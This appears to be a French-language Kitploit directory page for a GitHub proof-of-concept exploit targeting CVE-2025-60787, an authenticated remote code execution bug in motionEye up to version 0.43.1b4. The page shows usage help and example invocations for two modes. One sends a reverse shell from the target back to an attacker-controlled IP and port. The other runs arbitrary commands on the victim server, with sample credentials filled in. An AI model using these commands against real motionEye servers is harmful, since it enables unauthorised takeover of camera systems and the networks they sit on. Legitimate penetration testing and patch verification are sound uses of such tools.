Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-60787 — PoC automatisé pour CVE-2025-60787 fournissant une exécution de code à distance authentifiée contre les serveurs motionEye jusqu'à 0.43.1b4, avec les modes shell inversé et exécution de commande. | Kitploit
Outils/GitHubGitHub/gunzf0x/cve-2025-60787
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

PoC automatisé pour CVE-2025-60787 fournissant une exécution de code à distance authentifiée contre les serveurs motionEye jusqu'à 0.43.1b4, avec les modes shell inversé et exécution de commande.

Voir le dépôt
10117il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-60787 - RCE authentifié dans motionEye

PoC pour CVE-2025-60787 qui est une vulnérabilité RCE authentifiée pour motionEye avec toutes les versions affectées jusqu'à 0.43.1b4 (incluse).

Ceci est un PoC automatisé pour la vulnérabilité décrite dans ce dépôt. Remerciements à prabhatverma47.

Utilisation

Le script a 2 commandes qui exploitent la vulnérabilité. L'une qui envoie directement un reverse shell appelée revshell et une autre commande appelée command pour exécuter directement des commandes en exploitant cette CVE.

root@kitploit:~
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

Reverse Shell

Utilisez la commande revshell pour obtenir un shell. Par exemple :

root@kitploit:~
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

Où 10.10.10.10 est la machine cible (machine exécutant motionEye), 10.10.10.15 est notre machine attaquante et 9001 est le port sur lequel nous écoutons pour recevoir un reverse shell.

Exécution de commandes

Si au lieu d'un reverse shell nous voulons exécuter d'autres commandes à distance, nous pouvons utiliser l'option command. Par exemple, exécutez la commande ping -c1 10.10.10.15 sur la machine victime :

root@kitploit:~
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

Où 10.10.10.10 est la machine exécutant motionEye.

Avertissement

Utilisez toujours ce script sous votre propre responsabilité.

Soyez éthique (:

Télécharger l’outil